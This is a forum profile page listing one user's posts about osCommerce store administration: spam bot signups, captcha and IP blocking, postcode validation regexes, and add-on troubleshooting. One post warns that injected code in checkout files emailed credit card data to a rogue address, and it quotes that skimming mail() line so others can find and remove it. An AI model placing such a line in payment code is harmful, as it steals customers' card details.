Jump to content

tonymazz

Members
  • Content count

    79
  • Joined

  • Last visited

Everything posted by tonymazz

  1. tonymazz

    HoneyPot Captcha

    @Jack_mcs & @ecartz Sorry, I mistyped. i made no core changes.
  2. tonymazz

    HoneyPot Captcha

    I found this snippet: https://gist.github.com/digvijay1985/b8015b58000acb27d663 for post code formats <?php $country_code="US"; $zip_postal="11111"; $ZIPREG=array( "US"=>"^\d{5}([\-]?\d{4})?$", "UK"=>"^(GIR|[A-Z]\d[A-Z\d]??|[A-Z]{2}\d[A-Z\d]??)[ ]??(\d[A-Z]{2})$", "DE"=>"\b((?:0[1-46-9]\d{3})|(?:[1-357-9]\d{4})|(?:[4][0-24-9]\d{3})|(?:[6][013-9]\d{3}))\b", "CA"=>"^([ABCEGHJKLMNPRSTVXY]\d[ABCEGHJKLMNPRSTVWXYZ])\ {0,1}(\d[ABCEGHJKLMNPRSTVWXYZ]\d)$", "FR"=>"^(F-)?((2[A|B])|[0-9]{2})[0-9]{3}$", "IT"=>"^(V-|I-)?[0-9]{5}$", "AU"=>"^(0[289][0-9]{2})|([1345689][0-9]{3})|(2[0-8][0-9]{2})|(290[0-9])|(291[0-4])|(7[0-4][0-9]{2})|(7[8-9][0-9]{2})$", "NL"=>"^[1-9][0-9]{3}\s?([a-zA-Z]{2})?$", "ES"=>"^([1-9]{2}|[0-9][1-9]|[1-9][0-9])[0-9]{3}$", "DK"=>"^([D-d][K-k])?( |-)?[1-9]{1}[0-9]{3}$", "SE"=>"^(s-|S-){0,1}[0-9]{3}\s?[0-9]{2}$", "BE"=>"^[1-9]{1}[0-9]{3}$" ); if ($ZIPREG[$country_code]) { if (!preg_match("/".$ZIPREG[$country_code]."/i",$zip_postal)){ //Validation failed, provided zip/postal code is not valid. } else { //Validation passed, provided zip/postal code is valid. } } else { //Validation not available } ?>
  3. tonymazz

    HoneyPot Captcha

    I appreciate all of the input and no, I have not tried recaptha 3 yet. I will give that a try on one of our sites. As to the clients complaints, I do not get it either. Although there have been times that I have become frustrated with ReCaptch when I have to pick 3 images that match a topic like traffic lights, storefronts etc. The end result is that I realize it is for security and get on with it. It seems people are spoiled with instant purchases (ie PayPal, Amazon, eBay etc). I even have had a lot of clients complain about making up a password and then retyping it in, which is why we now send them a random password in the Welcome email. And yes, I do think some logic on Post Code format, as well as country/state mismatch, is a good idea for many reasons. I found these postal code patterns in HTML5 -- http://html5pattern.com/Postal_Codes to offer some initial guidance. I did mitigate this issue (for now) after the dialogue yesterday gave me an idea. Since we really do not want or need signups until a purchase or quotation is made, I removed "create_account" from all of the pages as well as the login page. Renamed the "create_account" (changed it in filenames) and now it is only offered once something is in the cart and they hit "Checkout". Perhaps this should be an option for future versions, to deploy without core code changes? A hook that would show create account (and on which pages) or not. Thanks again all!
  4. tonymazz

    HoneyPot Captcha

    My screenshot was from the admin side. We automatically send random generated passwords to the client via welcome email and try to collect minimal info at the time of checkout. I thought about the email confirmation email, however over 75% of our clients want to just check out. Any delay in the checkout process can result in a lost sale. So that would not work. I agree with you on this. Should any visitor even be creating an account without an actual purchase to start with? An option in admin could toggle that as an option for those that would. In our case we are not interested in people signing up for a subscription or discounts as some commerce sites do. Perhaps, on the confirmation page the client is offered the opportunity to create an account at the end of the checkout confirmation (admin can set default). So, create_account would not be offered as a standalone, automatic account creation would only occur after a bonafide purchase. And of course the admin would need to be able to create an account from admin side. I will noodle this more.
  5. tonymazz

    HoneyPot Captcha

    In my experience, Blacklisting is not the complete answer either. I forgot to mention that some of the IPs used are being spoofed as Bing, Google, PayPal etc. You really do not want the bot to automatically get important IPs blocked out. One time we even had our own server's IP blocked. I since whitelisted those IPs in CSF, however that gives the spoofers a wide open ticket when they use a whitelisted IP. I did do one thing that helped a good bit. In CSF I blocked CC's. In our case we blocked RU, CN, Ukraine. Again this will not help block them if they are spoofing. And this puts a lot of stress on many servers. The list of CIDR's is quite lengthy. I run dedicated servers so the overhead is not as noticeable as it could be on a shared, cloud or other. cables24h, you may want to look at the bad_behavior add-on which automatically blocks IPs via htaccess. It works well, but again if they spoof an important IP for your store, it can be detrimental. I use it, although modded for our needs to prevent certain header requests, user agents and to help block the IPs that are initiating script injections. 'better ask why someone choose your website to "spam"'. - If you are lucky enough to have a successful site, with high ranking, you will eventually get sniffed out by the spambots and scriptkitties. They will find you; especially when you advertise on FB, Google and Bing which brings even more notice to our sites. Another reason: Competitors or BlackHat will sometimes do things like this to cause havoc. These signups create spam to a legit email address. Enough spam reports will get you on the RBL; once there, it takes a lot of effort and time to get removed. Until then an ISP like AOL will block your domain from sending anyone with an aol account any emails. So, Unintended consequences is a real concern for us: if you make it too tight you will either block or alienate your legitimate clients. I try hard to prevent this. I post his info in an effort to corroborate, not insult. I believe there needs to be many approaches to this issue and there is always going to be a workaround by the other side. A constantly evolving problem. @Jack_mcsI will post the details of the next signup. I delete them on the fly so I do not have one at the moment. Any hour though, unfortunately. Thanks again for your work on this project. And all of the others too!
  6. tonymazz

    HoneyPot Captcha

    I have tried reCaptcha and have had many real customers complain about it. With my own reCaptcha experiences, I must admit it is difficult to determine a storefront or traffic sign etc. It can be a real 'turn off' when registering at a site to make a purchase. I prefer to make our signup experience as hurdle and trouble free as possible. ReCaptcha2 did not prevent these signups, btw.
  7. tonymazz

    HoneyPot Captcha

    Nothing to do with HP, i see the IP's in my whosOnline. I started blocking those offenders in htaccess but quickly discovered that they changed with each visit to the site.
  8. tonymazz

    HoneyPot Captcha

    Few more points: We have honeypot installed (Math Captcha = False) and create account is still happening. I am not seeing the Password Reset events as @mhsuffolk has outlined. Not yet, anyway. They are spending about 90 seconds on average with 4 clicks, last one resulting in create_account. I created a new create _account.php and renamed it site wide including in filenames.php; within the hour the bot or ? figured out the new page, which confirms it is not coming right in to the create_account.php page. It seems to come in on a product page and then go to 'create account' without adding anything to the cart
  9. tonymazz

    HoneyPot Captcha

    @Jack_mcs, @mhsuffolk & @MikepoWe are getting about 15 to 20 of these 'create account' per day. Assorted letters in both upper and lower case with random lengths. The email addresses are 98% legit, so that means that our system is sending Welcome Spam, nice. The phone number field is a string of numbers and appear to be legit looking. I have the fax field disabled. I have been watching these sign-ups for a common thread that could be used to block registration. They are picking the first country listed. Maybe that country could be a country that you dont ship to and then block that registration. I also noticed that the Post Code is always a string of random letters (upper and lower case), but no numbers. This could definitely be a source for blocking since I am unaware of any countries we ship to that are all letters. The ip's switch so blocking the IP is an exercise in futility. I have seen a different country for each sign-up.
  10. tonymazz

    HoneyPot Captcha

    Thank you. I am having an issue with my tests, allowing incorrect math sum to still create accounts. When the field is left empty, one cannot continue however any answer will allow the account creation. Any idea what I may be missing? Thanks again...
  11. tonymazz

    HoneyPot Captcha

    Hi Jack. Thank you for all of the many hours you put in to these addons!! In reviewing this I noticed a define missing in the languages define('FORM_REQUIRED_INPUT', 'Enter Total Here');
  12. If you want it to show in subcategories, either specify the cat id or use enter ALL. When adding or updating extra fields, put the desired categories id in the Category field, followed by a COMMA. The trailing COMMA is important, you need to add it after each category id even if you only write one category! If you want to have a field that will be used for all products, write "all" and nothing else. If you have subcate- gories, you can also put parent categories id here, the field will show up in all subcategories as well.
  13. tonymazz

    The Feedmachine Solution

    On your first issue, try this, 'price' => array('output' => 'FINAL_PRICE_WITHOUT_TAX', 'type' => 'KEYWORD' I did and I now get the exact price including special if applicable.
  14. tonymazz

    The Feedmachine Solution

    Hi! I too need assistance with Shopzilla's field limits. Your efforts are appreciated.
  15. tonymazz

    The Feedmachine Solution

    Hi! Thanks for the contribution. Seems to be working fine until I disable a category using the contribution DISABLE/ENABLE CATEGORIES at http://addons.oscommerce.com/info/6462 . Have you run into this and is there a way for me to ignore the categories I have disabled.? Thanks in advance for all of your efforts. BR, Tony...
  16. tonymazz

    SiteMonitor

    I am on the same server with different accounts. One account is fine, the Site Monitor works great, as well does the Hacker Code portion. However when i try the same thing in the other account which has all data directories linked. The osCommerce files are not linked and are what I want to monitor with this contribution like I do on the main account. I was hoping to do this with all of my stores. They all link back (just like public_html & www) to the main account files. In each instance the osCommerce files are unique & not linked. My problem is on each of those linked directories I get the error codes as follows: Warning: is_dir() [function.is-dir.html]: Stat failed for /home/cat/public_html/mannix (errno=13 - Permission denied) in /home/insp01/public_html/admin/includes/functions/sitemonitor_functions.php on line 173 Warning: is_dir() [function.is-dir.html]: Stat failed for /home/cat/public_html/mannix (errno=13 - Permission denied) in /home/insp01/public_html/admin/includes/functions/sitemonitor_functions.php on line 256 Warning: is_dir() [function.is-dir.html]: Stat failed for /home/cat/public_html/mannix (errno=13 - Permission denied) in /home/insp01/public_html/admin/includes/functions/sitemonitor_functions.php on line 173 And then it craps out. It does not seem to want to ignore the linked directories. Thanks
  17. tonymazz

    SiteMonitor

    Hi again; I found this code to exclude a file, would this work on directories, as well? I have tried a couple variations with no luck. Here is the error I am getting for each directory that is linked: Warning: is_dir() [function.is-dir.html]: Stat failed for /home/XXXSSS/public_html/mannix (errno=13 - Permission denied) in /home/XXXSSS/public_html/admin/includes/functions/sitemonitor_functions.php on line 173 Thanks again...
  18. tonymazz

    SiteMonitor

    Hi Jack; along the lines of the directories to be ignored. I have one site that is mostly symbolic links. Is there a way to ignore them? Thanks for your efforts on this contribution.
  19. tonymazz

    SiteMonitor

    Hi! Thanks for a great contribution. Need a little help. I have this working great on my base shop, but when I try ti use it on a different shop that utilizes a great deal of 'symbolic links', I get a string of errors for each linked directory. Like this: Warning: is_dir() [function.is-dir.html]: Stat failed for /home/catalog/public_html/manuals/manuals (errno=13 - Permission denied) in /home/catalog/public_html/admin/includes/functions/sitemonitor_functions.php on line 174 I tried excluding the linked directories without success. Has anyone come across a 'work-around' for this? Thanks again!
  20. tonymazz

    Authorize.net is down

    Not sure if this is related to the Authorize.net outage. When I was alerted that the credit card transactions were not processing, I started looking into the pages that were hanging up. Inspect these files: checkout_payment.php, checkout_confirmation.php, checkout_process.php . Verify that there is no added scripts which will email the CC info to a rogue address. I found this on 2 sites I maintain so far. Both using heavily modded versions of OsCommerce 2.2. Be sure to remove this code. The line of code that instructs it to mail the vital info is something like this: mail("rogue.email@public_email.com","Cvv - Site $site!",$message123,$headers123)
  21. tonymazz

    OSC-Affiliate

    Hi! Thanks for the reply & PM pizza. I tried your suggestions with no differences. I did finally get the images to work, however I had to create a new directory for my images and place a copy of each of my images in to it. Basically when I debugged it I found that the show banner is not placing the / between the 2 directories. For example /catalog/images - becomes catalogimages. So by creating a new image folder named catalogimages the problem is solved for now. Does anyone know how to correct this without changing the main configure file. When I change the main configure file none of the images work on the site at all. Thanks again, Tony...
  22. tonymazz

    OSC-Affiliate

    Have you found a solution to the images not showing up yet? I too am having that issue. Any help is appreciated
  23. Anyone figure the solution out for this, as I too am having the same issue...
×